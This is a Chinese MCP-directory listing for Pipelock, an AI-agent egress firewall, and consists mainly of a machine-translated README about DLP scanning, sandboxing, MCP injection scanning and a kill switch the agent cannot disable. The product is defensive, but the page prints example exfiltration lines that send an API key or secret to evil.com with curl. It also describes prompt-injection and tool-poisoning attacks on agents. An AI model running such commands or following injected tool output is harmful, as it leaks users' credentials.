Token导航 LogoToken导航TokenDH.com
Pipelock MCP logo
安全风控stdio官方级别未说明来源级核验

Pipelock MCP

MCP Server

开源AI代理防火墙,提供网络扫描、进程隔离、MCP感知策略执行及独立可验证的代理行为证明。

工具数

0

提示词数

0

GitHub Stars

587

资源数

0
安全GoClaudeClaudeCursorVS Code

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

作者 / 组织

luckyPipewrench

提供方

luckyPipewrench

最后核验

2026/5/17 20:47

运行时

Docker

快速接入

先看主来源和安装命令,再打开仓库或文档;下面只保留这个条目的关键接入事实。

命令预览

docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \

详细介绍

管道锁

带有中介签名的开源AI代理防火墙 行动收据 来自代理信任边界之外。 网络扫描、进程控制、MCP感知策略执行,以及在单个二进制文件中独立验证代理行为的证明。了解更多: 开源AI防火墙.

内置代理外部认证。 收据由调解员签署,不在代理人流程和其证书范围内,因此证据并不取决于代理人对自己的证明。

涵盖MCP安全、代理出口安全、AI代理的DLP和即时注入防御。 Pipelock充当出站HTTP、WebSocket和MCP流量的代理出口代理,具有双向MCP扫描、48种凭证模式和25种6通道规范化的注入模式。

适用于: 克劳德代码·光标·VS代码·JetBrains·OpenAI代理SDK·谷歌ADK·AutoGen·CrewAI·LangGraph

快速开始 · 它的作用 · 文档 · 博客 · 问Dosu

问题

你的AI代理已经 $ANTHROPIC_API_KEY 在其环境中,加上shell访问。只需一个请求:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

你的代理执行的每一个机器操作(HTTP请求、工具调用、浏览器会话)都跨越了你的秘密和开放互联网之间的界限。Pipelock位于该边界处。它扫描每个出站和入站请求,阻止渗透和注入,对代理进程进行沙盒处理,并生成所发生事情的签名证据。

Pipelock demo

快速开始

# Install
brew install luckyPipewrench/tap/pipelock

# Set up (discovers IDE configs, generates config, verifies detection)
pipelock init

# Test it
pipelock check --url "https://example.com/?key=EXAMPLE-SECRET-VALUE-1234"  # blocked
pipelock check --url "https://docs.python.org/3/"                            # allowed

Other install methods

# Download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# From source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Verify release integrity (SLSA provenance + SBOM)

gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock: --owner luckyPipewrench

它的作用

管道锁是一种 AI出口代理MCP安全控制:它位于您的AI代理和网络之间,扫描出站和入站流量,并发出签名收据和中介元数据以进行独立认证。

11层URL扫描器

每个请求都经过:方案验证、CRLF注入检测、路径遍历阻止、域阻止列表、DLP模式匹配(API密钥、令牌、证书、加密货币密钥、环境变量机密和带有校验和验证的金融标识符的48个内置模式)、路径熵分析、子域熵分析、防止DNS重新绑定的SSRF保护、逐域速率限制、URL长度限制和逐域数据预算。

DLP在DNS解析之前运行,旨在在任何DNS查询离开代理之前捕获机密。BIP-39种子短语检测使用具有字典查找、滑动窗口匹配和SHA-256校验和验证的专用扫描仪,以捕获所有传输表面上的加密货币助记符泄漏。

docs/bypass-resistance.md 对于完整的规避测试矩阵。

工艺沙箱

使用操作系统本机内核原语的非特权进程控制。在Linux上:Landlock LSM限制文件系统访问,seccomp过滤危险的系统调用,网络命名空间强制所有流量通过pipelock的扫描程序(没有直接出口)。在macOS上:沙盒exec配置文件限制文件系统和网络。在容器中,使用 --best-effort 当命名空间创建受到限制时,用于Landlock+seccomp包含(网络扫描使用基于代理的路由而不是内核强制)。

pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py  # containers
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server

响应扫描

在到达制剂之前,扫描提取的内容物以进行及时注射和状态/控制中毒。一个6通道规范化管道捕获零宽度字符规避、同形符替换、leetspeak编码和base64包装的有效载荷。25种内置模式涵盖了越狱短语、指令操作、凭证请求、内存持久性、偏好中毒、隐蔽动作指令、模型指令边界和CJK语言指令覆盖。行动: block, strip, warn,或 ask (人在回路终端批准)。

text/event-stream 响应(OpenAI聊天完成、Anthropic消息、Kilo网关、MCP HTTP/SSE)通过按事件DLP和注入扫描进行流式传输,因此在保持身体扫描的同时保留了逐个令牌的LLM聊天UX。立即清除事件;检测终止流故障关闭。压缩的SSE流被拒绝,因为压缩字节逃避正则表达式匹配。看 SSE流媒体指南.

请求更正

可选的请求端编校会在匹配的JSON值离开代理之前重写它们。相同的匹配器涵盖HTTP请求体、出站WebSocket客户端消息和MCP tools/call params.arguments 跨stdio、HTTP/SSE和WebSocket传输。替换是键入的占位符,例如 ,并且签名的操作收据仅记录活动配置文件和每类计数。

MCP代理

用双向扫描包装任何MCP服务器。三种传输模式:stdio子进程封装、流式HTTP桥接和HTTP反向代理。双向扫描:检查客户端请求是否存在DLP泄漏,扫描服务器响应以进行注入,以及 tools/list 检查反应中是否有中毒的描述和中途的地毯拉扯变化。

# Wrap a local MCP server (stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# Proxy a remote MCP server (HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

# Combined mode (fetch/forward proxy + MCP on separate ports)
pipelock run --config pipelock.yaml --mcp-listen 0.0.0.0:8889 --mcp-upstream http://localhost:3000/mcp

MCP工具政策

在危险的工具调用到达MCP服务器之前阻止它们的预执行规则。附带17条内置规则,涵盖破坏性操作、凭证访问、反向shell、持久性机制和编码命令执行。Shell混淆检测是内置的。v2.0增加了一个 redirect 通过经过审核的包装器路由危险操作而不是直接阻塞的操作。

工具调用链检测

检测MCP工具调用序列中的攻击模式。配备10种内置模式的船只,涵盖侦察、凭证盗窃、数据暂存、持久性和渗透链。使用具有可配置间隙容限的子序列匹配,因此在攻击步骤之间插入无害调用不会逃避检测。

紧急停止开关

Emergency deny-all具有四个独立的激活源:配置文件、SIGUSR1、sentinel文件和远程API。任何一个活动都会阻止所有流量。API可以在单独的端口上运行,因此代理无法停用自己的终止开关。

# Activate from operator machine
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'

扫描API

程序化扫描的评估端点。任何工具、管道或控制平面都可以提交URL、文本或工具调用,并得到结构化的判断(代理不需要在请求路径中)。四种扫描方式: url, dlp, prompt_injection,以及 tool_call。返回带有扫描程序类型、规则ID和严重性的结果。承载令牌认证、每个令牌的速率限制和Prometheus指标。

docs/scan-api.md 以获取API的完整参考。

地址保护

检测区块链地址中毒攻击,其中用相似地址替换合法地址。验证ETH、BTC、SOL和BNB链的地址,与用户提供的分配列表进行比较,并使用前缀/后缀指纹识别标记类似的地址。专为与DeFi协议交互或执行事务的代理而设计。

文件系统Sentinel

监视代理工作目录中写入磁盘的机密。当MCP子进程写入包含凭据的文件时,pipelock会使用应用于网络流量的相同DLP模式进行检测。在Linux上,进程沿袭跟踪属性文件会写入代理的进程树。看 docs/guides/filesystem-sentinal.md.

事件排放

将审核事件转发到外部系统(SIEM、webhook接收器、syslog)。事件是即发即弃,并且从不阻止代理。在适用的情况下,每个事件都包括MITRE ATT&CK技术ID(T1048用于渗出,T1059用于注射,T1195.002用于供应链)。

docs/guides/siem-integration.md 用于日志模式、转发模式和示例SIEM查询。

安全评估

pipelock assess 对您的部署运行四阶段安全评估:攻击模拟(DLP、注入、工具中毒和URL规避的20种情况)、配置审计(12个类别得分0-100)、部署验证(扫描和遏制的实时探测)和MCP服务器发现(Claude Code、Cursor、VS Code和其他客户端的保护状态)。

关键风险,如未受保护的MCP服务器,无论数字分数如何,都会限制等级。

pipelock assess init --config pipelock.yaml
pipelock assess run assessment-a1b2c3d4/
pipelock assess finalize assessment-a1b2c3d4/

免费摘要显示了你的成绩、分数和最高分。获得许可的用户可以获得包含服务器特定发现、补救命令和Ed25519签名证据的完整报告。

Pipelock Security Summary showing grade C (79/100) with compliance coverage, MCP protection, and detection scoring

飞行记录器

带有Ed25519签名检查点和DLP编校的哈希链JSONL证据日志。每个代理决策都被记录为与前一个决策链接的防篡改条目。动作收据提供了每个中介动作的加密签名证明(发生了什么、判决是什么、哪个策略是活动的),请求端重写添加了一个压缩 redaction 摘要块,而不是存储明文秘密。独立验证任何收据 pipelock verify-receipt.

Canary代币

合成秘密注入到代理的环境中。如果pipelock在出站流量中检测到金丝雀,则证明代理(或其链中的某些东西)正在渗透环境变量。船舶与 pipelock canary 生成配置代码段。

更多功能

功能它做什么
审计报告pipelock report --input events.jsonl 生成带有风险评级、时间线和证据附录的HTML/JSON报告。Ed25519签约 --sign. (样品报告)
诊断pipelock diagnose 运行7次本地检查,以验证您的配置是否端到端工作(不需要网络)
TLS拦截可选的CONNECT隧道MITM:解密、扫描正文/标头/响应、重新加密。 pipelock tls init 生成CA,然后 pipelock tls install-ca 全系统信任它。
阻止提示选择加入 explain_blocks: true 向被阻止的响应添加修复建议
项目审计pipelock audit ./project 扫描安全风险并生成定制的配置
配置评分 (v2.0)pipelock audit score --config pipelock.yaml 评估12个类别的安全态势(0-100,字母等级)。标记过度许可的工具策略。
文件完整性SHA256清单检测修改、添加或删除的工作区文件
Git保护`git diff \pipelock git scan-diff` 在秘密被泄露之前就抓住了
Ed25519签署多代理信任的密钥管理、文件签名和签名验证
会话分析每会话行为分析(域突发、卷峰值)
适应性执法每个会话的威胁评分,包括从警告到阻止的自动升级、降级计时器和域突发检测
发现抑制通过配置规则或内联消除已知的误报 pipelock:ignore 评论
多代理支持通过以下方式识别代理人 X-Pipelock-Agent 每个代理筛选的标头
车队监控Prometheus指标+准备导入 Grafana仪表板
A2A扫描针对谷歌代理到代理协议的代理卡中毒检测、卡漂移监测、会话走私预防
行为基线配置文件然后锁定MCP工具行为。在窗口期间学习正常模式,在批准后标记偏差。
拒绝钱包重试、扇出和并发工具调用的每个代理预算。捕捉环路风暴和放大攻击。
台风升级跨MCP+任务边界的基于风险敞口的策略升级。最近观察到不受信任内容的会话会对受保护的操作进行增强扫描,直到明确恢复信任为止。
调解信封RFC 8941转发HTTP请求和MCP的边带元数据 _meta,携带操作类型、判决、参与者身份、策略哈希、污染上下文和接收相关性ID。v2.4在以下位置添加了带重放保护的入站验证、SPIFFE参与者格式和RFC 9421众所周知的签名密钥目录 /.well-known/http-message-signatures-directory。参见 联盟指南.
收据合规性交叉实施收据验证套件(sdk/conformance/)加上参考Python验证器(pipelock验证python),因此可以在Go实现之外验证收据。v2.4添加 EvidenceReceipt v2 用于学习和锁定生命周期和影子证据;Go参考今天验证v2收据,并准备 pipelock-verify-python 0.2.0更新在发布后添加了v1链和单个v2收据。v2链验证仍然是后续工作。
学习和锁定 (v2.4)每代理行为契约:观察代理的真实流量,编译已签名的候选契约,在阴影中回放捕获的观察结果,按规则批准,推广已签名的活动清单,以及 强制直播 在每个承载URL的传输以及MCP工具调用界面(正向、反向+重定向、拦截、/获取、WebSocket、MCP HTTP、MCP stdio桥、MCP stdo子进程)上。生命周期、影子和运行时 proxy_decision 收据使用 EvidenceReceipt v2,链接到活动清单哈希。扫描块在每条门控路径上总是胜过合同允许。看 学习和锁定指南.
阻止原因标题 (v2.4)X-Pipelock-Block-Reason 每个支持HTTP的块路径(前向/拦截/获取/反向/MCP HTTP/WebSocket关闭帧有效载荷)上的响应标头,具有固定的原因词汇表、严重性级别和重试提示。MCP内部JSON-RPC块(tool_poisoning, tool_chain_blocked,MCP stdio)在没有HTTP响应面的JSON-RPC错误元数据上携带相同的原因词汇表。让代理对块做出智能反应,而无需解析主体。看 阻塞原因标头.
楔形检测监视器 (v2.4)health_watchdog 回报 /health 503当子系统心跳失效时(代理热路径、MCP侦听器、规则引擎重新加载观察器),集群活性探测器会自动检测到楔形扫描仪。可选的 expose_subsystems: true 为操作员仪表板添加每个子系统的映射。看 健康终点指南.
Redaction提供程序插件形状 (v2.4)Anthropic、OpenAI和Gemini聊天API都提供了第一方编校解析器。提供者插件形状(internal/redact/providers.go::DefaultProviderSpecs())允许第三方LLM提供程序注册正文解析器,而无需分叉redact包。通过前向/拦截/反向/Webocket传输进行有线连接。
媒体政策控制媒体响应处理:从JPEG/PNG中剥离隐写元数据(字节级手术,像素相同输出),默认情况下拒绝音频/视频,强化SVG活动内容(foreignObject、事件处理程序、外部href),并对解压缩炸弹强制执行图像大小限制。
合规性映射OWASP MCP前10名、OWASP代理前15名、NIST 800-53、欧盟人工智能法案、SOC 2覆盖文件

Pipelock Agent Egress Report showing risk rating, timeline, findings by category, and evidence appendix

Pipelock Fleet Monitor: Grafana dashboard showing traffic, security events, and WebSocket metrics

运作原理

管道锁的用途 能力分离:代理进程有秘密,但没有直接的网络访问。Pipelock具有网络访问权限,但没有代理机密。即使代理被提示注入,它也无法到达防火墙的控制。

三种HTTP代理模式(同一端口),以及专用的MCP和A2A代理:

  • 获取代理 (/fetch?url=...):获取URL,提取文本,扫描注入,返回干净的内容。
  • 正向代理 (HTTPS_PROXY):标准HTTP CONNECT隧道。零代码更改。可选的TLS拦截用于全负载扫描。
  • WebSocket代理 (/ws?url=ws://...):双向帧扫描,DLP+注入检测。
  • MCP代理 (pipelock mcp proxy):用双向扫描包装stdio或HTTP MCP服务器。
  • A2A代理:检查Google代理到代理协议流量。
flowchart LR
    subgraph PRIV["PRIVILEGED ZONE"]
        Agent["AI Agent\nAPI keys + credentials + source code\nNetwork-isolated by deployment"]
    end

    subgraph FW["FIREWALL ZONE"]
        Proxy["Pipelock\n11-layer scanner pipeline\nNo agent secrets"]
    end

    subgraph NET["INTERNET"]
        Web["APIs + MCP Servers + Web"]
    end

    Agent -- "fetch / CONNECT / ws / MCP / A2A" --> Proxy
    Proxy -- "scanned request" --> Web
    Web -- "response" --> Proxy
    Proxy -- "scanned content" --> Agent

    style PRIV fill:#2d1117,stroke:#f85149,color:#e6edf3
    style FW fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style NET fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3
    style Agent fill:#1a1a2e,stroke:#f85149,color:#e6edf3
    style Proxy fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style Web fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3

Text diagram (for terminals)

┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws/MCP │  - WS frame scanning  │
│                      │

## 安全矩阵

Pipelock以三种模式运行:

|模式|安全| Web浏览|用例|
|------|----------|--------------|----------|
| **严格** |仅允许列表|无|受监管行业,高安全性|
| **平衡的** |阻止简单+检测复杂|通过获取或转发代理|大多数开发人员(默认)|
| **审计** |仅记录|无限制|执行前评估|

对于运行未经审查或迭代模型(如OBLITERATUS)的代理 [`hostile-model` 预设](configs/hostile-model.yaml) 在严格模式之上添加额外的防御:激进的熵阈值(3.0)、全面的网络工具阻止、会话绑定、交叉请求泄漏检测和预配置的终止开关。 `pipelock audit` 当检测到已知的护栏拆卸工具链时(目前基于依赖关系的检测),建议使用此预设。

每种模式阻止、检测或记录的内容:

|攻击向量|严格|平衡|审核|
|---------------|--------|----------|-------|
| `curl evil.com -d $SECRET` | **预防** | **预防** |已登录|
|URL查询参数中的秘密| **预防** | **检测到** (DLP扫描)|已记录|
|URL中的Base64编码秘密| **预防** | **检测到** (熵扫描)|已记录|
|DNS隧道| **预防** | **检测到** (子域熵)|已记录|
|块状渗出| **预防** | **检测到** (费率+数据预算)|已记录|
|URL中的公钥加密blob| **预防** |已记录(熵标记它)|已记录|

> **诚实评价:** 严格模式会阻止除allowlisted API域之外的所有出站HTTP,因此没有通过代理的exfiltering通道。平衡模式将标准从“一个curl命令”提高到“复杂的预先计划的攻击”。审计模式为您提供了今天没有的可见性。启用沙盒后(`pipelock sandbox`),pipelock在内容检查的基础上添加了操作系统级包含(Landlock+网络命名空间+seccomp)。代理无法绕过代理,因为它没有直接的网络访问权限。

## 配置

从三个CLI预设之一生成配置,或让 `pipelock audit` 为您的项目量身定制一个:

pipelock generate config --preset balanced > pipelock.yaml pipelock audit ./my-project -o pipelock.yaml


|CLI预设|模式|操作|最适合|
|------------|------|--------|----------|
| `balanced` |平衡|警告|通用(默认)|
| `strict` |严格|封锁|高安全、受监管的行业|
| `audit` |审核|警告|仅记录评估|

附带四个额外的预设文件 `configs/` 对于特定工作流:

|文件|模式|最适合|
|------|------|----------|
| `configs/claude-code.yaml` |平衡|克劳德代码无人值守|
| `configs/cursor.yaml` |平衡|光标IDE|
| `configs/generic-agent.yaml` |平衡|新代理(调整阶段)|
| `configs/hostile-model.yaml` |严格|未审查/未迭代模型|

配置更改会通过文件监视器或SIGHUP自动获取。完整参考: **[docs/configuration.md](docs/configuration.md)**

对于误报调整: **[docs/假定位调整.md](docs/false-positive-tuning.md)**

## 集成指南

- **[克劳德代码](docs/guides/claude-code.md):** MCP代理设置, `.claude.json` 配置
- **[OpenAI 代码专家](docs/guides/codex.md):** MCP代理封装、转发代理、沙箱集成
- **[OpenAI代理SDK](docs/guides/openai-agents.md):** `MCPServerStdio`,多代理切换
- **[谷歌ADK](docs/guides/google-adk.md):** `McpToolset`, `StdioConnectionParams`
- **[自动生成](docs/guides/autogen.md):** `StdioServerParams`, `mcp_server_tools()`
- **[CrewAI](docs/guides/crewai.md):** `MCPServerStdio` 包装, `MCPServerAdapter`
- **[LangGraph](docs/guides/langgraph.md):** `MultiServerMCPClient`, `StateGraph`
- **[JetBrains/Junie](docs/guides/jetbrains.md):** IntelliJ、PyCharm、GoLand的MCP代理封装([攻略](https://pipelab.org/learn/jetbrains-integration/))
- **光标:** 使用 `configs/cursor.yaml` 使用与相同的MCP代理模式 [克劳德代码](docs/guides/claude-code.md) ([攻略](https://pipelab.org/learn/cursor-integration/))
- **[龙虾](docs/guides/openclaw.md):** 网关sidecar、init容器、配置包装

## 部署

Docker

docker pull ghcr.io/luckypipewrench/pipelock:latest docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \ ghcr.io/luckypipewrench/pipelock:latest \ run --config /config/pipelock.yaml --listen 0.0.0.0:8888

Network-isolated agent (Docker Compose)

pipelock generate docker-compose --agent claude-code -o docker-compose.yaml docker compose up

Kubernetes (Helm)

helm install pipelock charts/pipelock/


生产配方(Docker Compose与网络隔离、Kubernetes sidecar+NetworkPolicy、iptables/nftables、macOS PF): **[docs/guides/deployment-recipes.md](docs/guides/deployment-recipes.md)**

## CI集成

.github/workflows/pipelock.yaml

  • uses: luckyPipewrench/pipelock@v2

with: scan-diff: 'true' fail-on-findings: 'true'


下载预构建的二进制文件,运行 `pipelock audit`,扫描PR差异以查找泄露的机密,并将审计报告作为工作流工件上传。看 [`examples/ci-workflow.yaml`](examples/ci-workflow.yaml) 完整的工作流程。

### 可运行演示:工具响应注入

这 [`examples/tool-response-injection/`](examples/tool-response-injection/) harge运行了一个端到端的演示,其中具有无害名称和描述的MCP工具在其响应中隐藏了一个提示注入有效载荷。Pipelock在响应到达代理之前阻止它,并发出第三方可以验证的签名操作收据。同一演示针对三种具有一个共享签名密钥的传输运行:

- MCP stdio(子流程包装)
- MCP HTTP上游(stdio到HTTP网桥)
- MCP HTTP反向代理

cd examples/tool-response-injection python3 demo.py # needs python3 + cryptography + pipelock on PATH


## 社区规则

签名规则包添加了48个内置默认值之外的检测模式。DLP、注射和工具毒物类别中的28条社区规则:

pipelock rules install pipelock-community


看 [docs/rules.md](docs/rules.md) 了解详情。

## 比较

||管道锁|扫描仪(代理扫描)|沙盒(srt)|内核代理(agentsh)|
|---|---|---|---|---|
|防止秘密泄露|是|部分(代理模式)|部分(域级)|是|
|DLP+熵分析|是|否|否|部分|
|快速注射检测|是|是|否|否|
|MCP扫描(双向+刀具中毒)|是|是|否|否|
|WebSocket代理(帧扫描)|是|否|否|不|
|MCP HTTP传输(流式HTTP)|是|否|否|不|
|紧急切断开关(4个电源)|是|否|否|无|
|刀具调用链检测|是|否|否||
|进程沙箱(无Docker)|是|否|否|是(内核级)|
|单二进制,零deps |是|否(Python)|否(npm)|否|

参考矩阵: [docs/comparison.md](docs/comparison.md)

规范比较中心: [AI运行时安全性比较](https://pipelab.org/compare/)

OWASP Agentic Top 10 Coverage

|威胁|覆盖范围|
|--------|----------|
|ASI01特工目标劫持| **强:** 双向MCP+响应扫描|
|ASI02工具误用| **部分:** 代理作为受控工具,MCP扫描|
|ASI03身份和特权滥用| **强:** 能力分离+SSRF保护|
|ASI04供应链漏洞| **部分:** 完整性监控+MCP扫描|
|ASI05意外代码执行| **中等:** HITL批准,失败关闭默认值|
|ASI06记忆和上下文中毒| **中等:** 提取内容的注入检测|
|ASI07代理间通信不安全| **部分:** 代理ID、完整性、签名|
|ASI08级联故障| **中等:** 故障封闭式架构,速率限制|
|ASI09人工智能信任开发| **部分:** HITL模式,审计日志记录|
|ASI10流氓特工| **强:** 域分配+速率限制+能力分离|

详细信息、配置示例和差距分析: [docs/owasp-mapping.md](docs/owasp-mapping.md)

## 文档

|文档|内容|
|----------|-------------|
| [配置参考](docs/configuration.md) |所有配置字段、默认值、热重载行为、预设值|
| [请求更正](docs/guides/redaction.md) |跨HTTP、WebSocket和MCP传输的JSON请求重写|
| [误报调整](docs/false-positive-tuning.md) |识别、抑制和调整扫描结果|
| [扫描API](docs/scan-api.md) |程序化扫描的评估端点|
| [部署食谱](docs/guides/deployment-recipes.md) |Docker Compose、K8s sidecar、iptables、macOS PF|
| [绕过阻力](docs/bypass-resistance.md) |已知的规避技术、缓解措施、限制|
| [已知攻击被阻止](docs/attacks-blocked.md) |带有复制片段的真实攻击|
| [SIEM集成](docs/guides/siem-integration.md) |日志模式、转发模式、SIEM查询|
| [指标参考](docs/metrics.md) |Prometheus度量系列、标签、JSON统计数据和警报规则|
| [社区规则](docs/rules.md) |安装、配置和创建已签名的规则包|
| [安全保障](docs/security-assurance.md) |安全模型、信任边界、供应链|
| [安全文件](docs/security/) |披露策略、不受支持的路径、密钥轮换、TLS CA威胁模型|
| [发现抑制](docs/guides/suppression.md) |规则名称、路径匹配、内联注释|
| [运输方式](docs/guides/transport-modes.md) |所有代理模式及其扫描功能|
| [OWASP MCP前10名](docs/compliance/owasp-mcp-top10.md) |OWASP MCP十大覆盖范围|
| [OWASP代理商前15名](docs/owasp-agentic-top15-mapping.md) |OWASP代理AI Top 15报道|
| [欧盟人工智能法案](docs/compliance/eu-ai-act-mapping.md) |欧盟人工智能法案合规性映射|
| [NIST 800-53](docs/compliance/nist-800-53.md) |NIST SP 800-53第5版控制映射|
| [策略规范v0.1](docs/policy-spec-v0.1.md) |可移植代理防火墙策略格式|
| [调解信封](docs/guides/mediation-envelope.md) |边带元数据头、配置、与收据的交互|
| [媒体政策](docs/guides/media-policy.md) |Stego剥离、SVG硬化、允许的类型、尺寸限制|
| [收据验证](docs/guides/receipt-verification.md) |验证收据CLI、一致性套件、链完整性|
| [收据运输保险范围](docs/guides/receipt-transports.md) |跨获取、转发、CONNECT/TLS、WebSocket、MCP和A2A路径的接收发射矩阵|
| [学习和锁定](docs/guides/learn-and-lock.md) |每代理行为契约:观察、编译、跟踪、批准、推广(v2.4)|
| [联邦](docs/guides/federation.md) |入站中介信封验证,SPIFFE参与者格式,RFC 9421知名目录(v2.4)|
| [阻止原因标题](docs/guides/block-reason-header.md) | `X-Pipelock-Block-Reason` 模式、原因词汇表、重试提示(v2.4)|
| [健康端点](docs/guides/health.md) | `/health` 503楔形检测、子系统心跳、操作员仪表板配置(v2.4)|
| [姿势胶囊](docs/guides/posture-capsule.md) |签名姿势快照, `posture verify` CLI、CI门、评分模型|
| [`pipelock init sidecar`](docs/cli/init-sidecar.md) |生成强制的Kubernetes伴随代理清单(战略合并、Kustomize、Helm值)|
| [`pipelock session`](docs/cli/session.md) |操作员CLI用于气闸检查和恢复(列出、检查、解释、释放、终止、恢复)|
| [徽章](docs/badges.md) |插入Markdown `scanned by pipelock` 下游项目徽章|

## 项目结构

cmd/pipelock/ CLI entry point internal/ cli/ 20+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...) session/ pipelock session operator CLI — airlock inspection and recovery setup/ pipelock init sidecar — companion-proxy manifest generation (K8s) config/ YAML config, validation, defaults, hot-reload (fsnotify) scanner/ 11-layer URL scanning pipeline + response injection detection audit/ Structured JSON logging (zerolog) + event emission dispatch proxy/ HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS mcp/ MCP proxy + bidirectional scanning + tool poisoning + chains discover/ IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains) killswitch/ Emergency deny-all (4 sources) + port-isolated API envelope/ Mediation envelope (RFC 8941) for sideband metadata media/ Image metadata stripping (JPEG/PNG byte-level surgery) normalize/ 6-pass text normalization (NFKC + invisible + leetspeak + vowel + stego strip) receipt/ Action receipt signing + hash-chained evidence posture/ Posture capsule schema, signing, scoring, verify policy session/ Session state, taint classification, task boundaries, trust overrides rules/ Bundle loader, tier taxonomy, RequiredFeatures enforcement sandbox/ Landlock, seccomp, netns, macOS sandbox-exec shield/ Airlock, browser shield, SVG hardening signing/ Ed25519 key management integrity/ SHA256 file integrity monitoring report/ HTML/JSON audit report generation enterprise/ Multi-agent features (ELv2) sdk/conformance/ Cross-implementation receipt verification test vectors charts/ Helm chart for Kubernetes deployment configs/ 7 preset config files docs/ Guides, references, compliance mappings


## 测试

Pipelock像安全产品一样进行测试。开源核心有数千个单元、集成和端到端测试。一个单独的私有对抗套件对生产二进制文件进行真实世界的攻击类练习。每个旁路在发布前都会进行回归测试。

|度量|值|
|--------|-------|
|Go测试(与 `-race`)|跨单元、集成和端到端路径的数千个|
|报表覆盖率|88%+|
|躲避技术测试|230+|
|扫描仪管道开销|~40us每次URL扫描|
|CI矩阵|转到1.25+1.26,CodeQL,golangci lint|
|供应链| SLSA来源、CycloneDX SBOM、共同签名|

## 学分

- 威胁模型由以下人员告知 [OWASP 代理 AI 前十名](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)
- 看 [docs/comparison.md](docs/comparison.md) 了解Pipelock与此空间中的其他工具的关系
- Dylan Corrales的安全审查贡献

欢迎捐款。看 [贡献.md](CONTRIBUTING.md) 作为指导方针。

如果Pipelock有用,请 [将此存储库星化](https://github.com/luckyPipewrench/pipelock)它帮助其他人找到项目。

## 许可证

Pipelock核心根据 **Apache许可证2.0**版权所有2026 Joshua Waldrep。

多代理功能(每个代理身份、预算和配置隔离)
都在 `enterprise/` 目录,由 `enterprise` 构建标签并获得许可
在...之下 **弹性许可证2.0(ELv2)**。这些功能使用有效的许可证密钥激活。

开源核心独立工作,没有付费功能。所有扫描、检测、,
并且单代理保护是免费的。

预构建的发布工件(Homebrew、GitHub发布、Docker镜像)包括付费层
使用有效许可证密钥激活的代码。从源头构建 `go install` 或
仓库 `Dockerfile` 生成仅限社区的二进制文件。

看 [许可证](LICENSE) 对于Apache 2.0文本和 [企业/许可证](enterprise/LICENSE) 对于ELv2文本。

目录标签

目录标签

安全GoClaudeAI安全本地部署网络扫描进程隔离MCP安全DLP防火墙

支持客户端

ClaudeCursorVS Code

接入字段

传输方式(transport,传输协议)

stdio

鉴权方式(authType,认证方式)

token

运行时(runtime,运行环境)

Docker

工具数量(toolCount,工具数)

0

资源数量(resourceCount,资源数)

0

提示词数量(promptCount,提示词数)

0

权限和风险

stdiotoken部署方式未说明

接入前请确认传输方式、认证方式和部署位置,并根据实际工具能力限制访问范围。

安装前确认

不要直接授予不必要的文件、网络或账号权限;先核对安装命令和配置内容。

来源信息

继续浏览同类 MCP